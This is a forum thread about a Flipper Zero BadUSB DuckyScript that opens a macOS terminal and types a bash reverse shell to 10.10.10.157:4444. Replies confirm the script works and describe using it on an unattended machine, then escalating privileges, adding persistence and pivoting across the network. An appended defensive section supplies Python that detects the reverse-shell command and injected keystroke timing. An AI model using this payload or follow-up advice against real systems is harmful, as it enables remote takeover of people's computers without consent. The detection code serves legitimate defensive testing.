DuckyScript backdoors

Recently, I saw a post about a person who uses the Flipper to test for potential weaknesses in their workplace. They basically posted a tutorial on how to make a reverse shell on a macOS running Linux. The code was fairly simple and didn’t seem real. You can see the code here, but can someone debunk this? I will also link the post for instructions. I can’t try it just yet, since my Flipper is currently arriving in the mail.

/* Flipper Zero ducky commands for backdoor exploits in macOS using reverse shells */

ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000

/* Replace text on “STRING bash” lower command with IP for mac (10.10.10.157) and replace upper command with port (4444) */

The original post can be viewed here
Or, if you don’t trust hyperlinks, here ---------> How to Get a Reverse Shell on macOS Using A Flipper Zero as a BadUSB | HackerNoon


It looks legit to me. There is a local IP to receive the shell.

Alright. What do you think this has access to on the victim’s computer?

It could potentially do anything you can imagine if it was run with root privilege or there was a flaw that let you escalate privileges. Make changes, execute code, erase everything, or add new users. Basically you would find an open terminal or unlocked Linux machine and run the script. After that you unplug the Flipper. Then you could run bash commands from another machine which is great if you only had a few seconds on the main machine because someone walked away for coffee. At that point you have time to do things like escalate privileges and add persistent access.

I would say the person that wrote the tutorial would do those types of things to test whether automatic detection tools were working properly and if security was responding to detection properly.

EDIT: I almost forgot. They would almost certainly see what access the target machine had to the rest of the network so they could try to “pivot” to other machines. That’s pretty standard.
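Since the thread frames this payload as a test of whether detection tooling fires, here is an added example (not from the thread or from the HackerNoon post) of two checks a defender could run: matching the `bash -i >& /dev/tcp/...` idiom the script types against process-execution events, and flagging a keystroke burst that is faster and more regular than a human typist, which is how a BadUSB keyboard looks to the host. The event records and keystroke timestamps are constructed sample data, and the timing thresholds are assumptions to tune per fleet.

```python
import re
from statistics import mean, pstdev

# Constructed sample: process-execution events as an EDR or auditd feed
# might record them. The IP and port are the ones quoted in the thread.
EVENTS = [
    {"ts": 1.00, "proc": "Terminal", "cmd": "ls -la ~/Downloads"},
    {"ts": 2.50, "proc": "Terminal", "cmd": "bash -i >& /dev/tcp/10.10.10.157/4444 0>&1"},
    {"ts": 3.10, "proc": "Terminal", "cmd": "git status"},
]

# The reverse-shell idiom from the payload: an interactive bash whose stdin,
# stdout and stderr are redirected to bash's /dev/tcp pseudo-device.
REVERSE_SHELL = re.compile(
    r"bash\s+-i\s*>&\s*/dev/tcp/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})/(?P<port>\d{1,5})"
)


def find_reverse_shells(events):
    """Return (ip, port) for every command matching the /dev/tcp reverse-shell idiom."""
    hits = []
    for ev in events:
        m = REVERSE_SHELL.search(ev["cmd"])
        if m:
            hits.append((m.group("ip"), int(m.group("port"))))
    return hits


# Constructed keystroke timestamps (seconds) for one Terminal window.
# A human typing varies a lot between keys; injected keystrokes arrive
# at a near-constant rate far faster than a person types.
HUMAN_KEYS = [0.00, 0.18, 0.41, 0.52, 0.90, 1.05, 1.33, 1.60]
INJECTED_KEYS = [0.000, 0.012, 0.024, 0.036, 0.048, 0.060, 0.072, 0.084]


def looks_injected(timestamps, max_mean_gap=0.03, max_jitter=0.005):
    """Flag a burst that is both faster and more uniform than human typing.

    Thresholds are assumed starting points: a mean inter-key gap at or below
    30 ms with at most 5 ms of jitter across a burst of at least six keys.
    """
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 5:
        return False
    return mean(gaps) <= max_mean_gap and pstdev(gaps) <= max_jitter
```

Either signal alone is noisy (a pasted command also arrives fast), so alert on the combination: an injected-looking burst followed within seconds by a shell that matches the reverse-shell pattern.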